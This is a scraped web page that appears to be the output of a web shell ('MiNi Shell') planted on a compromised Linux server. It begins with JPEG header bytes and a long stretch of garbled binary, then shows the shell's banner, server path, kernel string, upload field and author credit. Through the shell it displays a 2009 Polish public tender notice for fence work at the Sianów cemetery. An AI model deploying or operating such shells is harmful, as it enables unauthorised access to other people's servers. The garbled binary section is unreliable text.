JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090506/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090506/135316-N-2009.html

<p class="kh_header"><b>Sianów: WYMIANA CZĘŚCI OGRODZENIA CMENTARZA  W SIANOWIE - II etap</b><br>
<b>Numer ogłoszenia: 135316 - 2009; data zamieszczenia: 06.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina i Miasto Sianów , ul. Armii Polskiej 30/13, 76-004 Sianów, woj. zachodniopomorskie, tel. 094 3185281, faks 094 3185320.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sianow.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> eurzad.sianow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYMIANA CZĘŚCI OGRODZENIA CMENTARZA  W SIANOWIE - II etap.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje wykonanie: 
- demontaż istniejącego odcinka ogrodzenia wraz z bramą i furtką,
- wykonanie cokołu,
- wykonanie i montaż bramy wjazdowej, furtki wraz z 3 słupami,
- budowa odcinka ogrodzenia od strony ulicy Węgorzewskiej -  odcinek od wykonanej części  
  ogrodzenia w I etapie do końca ogrodzenia metalowego, od strony ul. Słowackiego - 
  odcinek ogrodzenia o długości ca 95 mb . Prace należy wykonać zgodnie z projektem  
  budowlanym  ogrodzenia oraz  pozwoleniem : Decyzja Nr 028/17/2008 z dnia 22.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 90.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Kryteria oceny ofert: cena oferty - 100%

1.	Dysponować wykwalifikowanym potencjałem kadrowym, tj. osobami bądź podmiotami posiadającymi niezbędne uprawnienia konieczne do realizacji przedmiotu zamówienia, wraz z  przynależnością do właściwej Izby Samorządu Zawodowego.
2.	Udzielić minimum 36-cio miesięcznej gwarancji.
3.	Wykonać przedmiot zamówienia w terminie do 60 dni kalendarzowych od daty podpisania umowy.
4	Wykażą się doświadczeniem obejmującym wykonanie lub realizowanie  w okresie ostatnich 5 lat, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie,  co najmniej  2 (dwóch) zamówień na roboty budowlane  o podobnym zakresie tj. ułożenie nawierzchni z kostki betonowej o pow. 1000 m2 i złożoności porównywalnej z zakresem robót będących przedmiotem zamówienia oraz  przedłożą dokumenty potwierdzające, że roboty te zostały wykonane należycie..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Dokumenty wymagane:

1)	wypełniony formularz ofertowy - załącznik Nr 1 do SIWZ, oferta powinna zawierać:
a)	nazwę Wykonawcy, adres, telefon, faks, datę sporządzenia oferty, nr REGON, nr KRS,
b)	oświadczenie czy wykonawca jest płatnikiem VAT, nr NIP,
c)	cenę ryczałtową wykonania zamówienia netto i brutto (tj. z podatkiem VAT),
d)	termin wykonania zamówienia tj. datę zakończenia robót,
e)	okres gwarancji na wykonanie przedmiotu zamówienia,
f)	akceptacja warunków płatności - rozliczenie za przedmiot umowy (dokonany będzie na podstawie ustaleń zawartych w rozdziale I pkt. III, podpkt. 3),
g)	oświadczenie w sprawie wykonania zamówienia siłami własnymi lub przy udziale podwykonawców.
2)	oświadczenie Wykonawcy sporządzone na druku Załącznik Nr 3 do SIWZ, zawierające:
a)	dane Wykonawcy,
b)	oświadczenie Wykonawcy, że zawarty w specyfikacji istotnych warunków zamówienia projekt umowy wraz z formularzem karty gwarancyjnej (Załącznik Nr 6 do SIWZ) został przez niego zaakceptowany i zobowiązuje się w przypadku wyboru jego oferty do zawarcia umowy w miejscu i terminie wyznaczonym przez Zamawiającego,
c)	oświadczenie Wykonawcy o akceptacji terminu związania ofertą,
d)	oświadczenie wykonawcy, że zapoznał się z treścią specyfikacji istotnych warunków zamówienia i nie wnosi do niej zastrzeżeń oraz, że zdobył konieczne informacje do przygotowania oferty oraz zapoznał się/dokonał oględzin z miejscem wykonania przedmiotu zamówienia,
e)	oświadczenie o nie zaleganiu z opłaceniem składek na ubezpieczenie społeczne i zdrowotne do Zakładu Ubezpieczeń Społecznych  lub Kasy Rolniczego Ubezpieczenia Społecznego oraz o nie zaleganiu z opłacaniem podatków , opłat do Urzędu Skarbowego,
f)	oświadczenie czy Wykonawca jest płatnikiem VAT,
g)	oświadczenie Wykonawcy o zapewnieniu  wysokiej jakości wykonywanych robót,
h)	oświadczenie Wykonawcy o zapewnieniu kierownika budowy z aktualną przynależnością  do Izby Inżynierów  i Techników  posiadającego odpowiednie  uprawnienia (jak w rozdziale III, pkt I pdpkt. 2.1))
3)	oświadczenie Wykonawcy w trybie art. 22 ust. 1 i art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych  na druku  Załącznik Nr 4 SIWZ,


4)	wykaz osób upoważnionych do podpisywania oferty i podejmowania zobowiązań w imieniu Wykonawcy (o ile nie wynika to z innych dokumentów),
5)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
6)	polisa lub inny dokument ubezpieczenia potwierdzający, ze Wykonawca jest ubezpieczony od odpowiedzialności  cywilnej w zakresie prowadzonej działalności gospodarczej,
7)	wykaz obejmujący wykonanie lub realizowanie w okresie ostatnich 5 lat co najmniej 2 (dwóch)  zamówień o porównywalnym  zakresie o wartości min. 100,000 PLN brutto i 2 referencje potwierdzające, że zamówienie zostało  zrealizowane   terminowo i z należytą starannością.

2.	Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej 

1)	jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa wyżej składa dokument lub dokumenty, wystawione zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości;
b)	nie orzeczono wobec niego zakazu ubiegania się o zamówienie,
2)	dokumenty o których mowa w pkt. 1a) i 1b), powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
3)	jeżeli w kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się powyższych dokumentów, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia  osoby lub kraju w którym Wykonawca ma siedzibę lub miejsce zamieszkania.

3.	Dokumenty wymagane w przypadku składania oferty wspólnej:

1)	oferta powinna zawierać dokumenty/oświadczenia dla każdego partnera z osobna /rozdział III pkt. II pdpkt. 1.3), 1.6), 1.7,  z dokumentów wymaganych/, pozostałe dokumenty są składane  przed jednego z Wykonawców lub wspólnie. Oferta oraz oświadczenie /rozdział III, pkt. II, pdpkt. 1.2)/ składane są wspólnie przez Wykonawców,
2)	pozostałe dokumenty oraz warunki  odnośnie ich treści i formy wymagane przez                           Zamawiającego w przypadku składania oferty wspólnej zostały określone w rozdziale III pkt. VII, pdpkt 2..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> eurzad.sianow.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy i Miasta w Sianowie, ul. Armii polskiej 30, 76-004: Sianów, Sekretariat.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.05.2009 godzina 09:45, miejsce: Urząd Gminy i Miasta w Sianowie, ul. Armii polskiej 30, 76-004: Sianów, Sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com